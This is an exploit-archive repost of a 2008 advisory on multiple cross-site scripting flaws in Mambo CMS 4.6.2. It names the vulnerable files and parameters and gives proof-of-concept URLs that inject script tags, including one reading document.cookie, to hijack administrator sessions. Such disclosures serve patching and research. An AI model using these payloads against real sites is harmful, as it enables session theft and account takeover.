Advertisement






Mambo 4.6.2 Full Version - Multiple Cross Site Scripting - By Khashayar Fereidani

CVE Category Price Severity
CWE-79 Not specified High
Author Risk Exploitation Type Date
Khashayar Fereidani High Remote 2008-08-28
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2008080161

Below is a copy:

----------------------------------------------------------------

Script : Mambo 4.6.2 Full & Older Versions

Type : Multiple Cross Site Scripting Vulnerabilities

Alert Level : Medium

----------------------------------------------------------------

Download From : http://surfnet.dl.sourceforge.net/sourceforge/mambo/MamboV4.6.2.zip

----------------------------------------------------------------

Discovered by : Khashayar Fereidani

My Website : HTTP://FEREIDANI.IR

Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com

----------------------------------------------------------------

Cross Site Scripting Vulnerability 1 :

Vulnerable File : administrator/popups/index3pop.php

Vulnerable Line (5)  : <title><?php echo $mosConfig_sitename; ?> - Administration [Mambo]</title>

Vulnerable Variable : mosConfig_sitename

For Example : http://Example/administrator/popups/index3pop.php?mosConfig_sitename=</t
itle><script>alert(document.cookie)</script>

Attacker can hijack administrator cookie and session and login with they

----------------------------------------------------------------

Cross Site Scripting Vulnerability 2 :

Vulnerable File : mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/co
nnector.php?

Vulnable Variable : Any Variable - You can set any variable ....

For Example set (hacker) variable : http://Example/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/co
nnectors/php/connector.php?khashayar=<script>alert('xss')</script>

you can set cross site scripting code in variable name : http://Example/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/co
nnectors/php/connector.php?<script>alert('xss')</script>=Hello+Word

----------------------------------------------------------------

Tnx : God

HTTP://IRCRASH.COM       HTTP://FEREIDANI.IR

----------------------------------------------------------------



Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum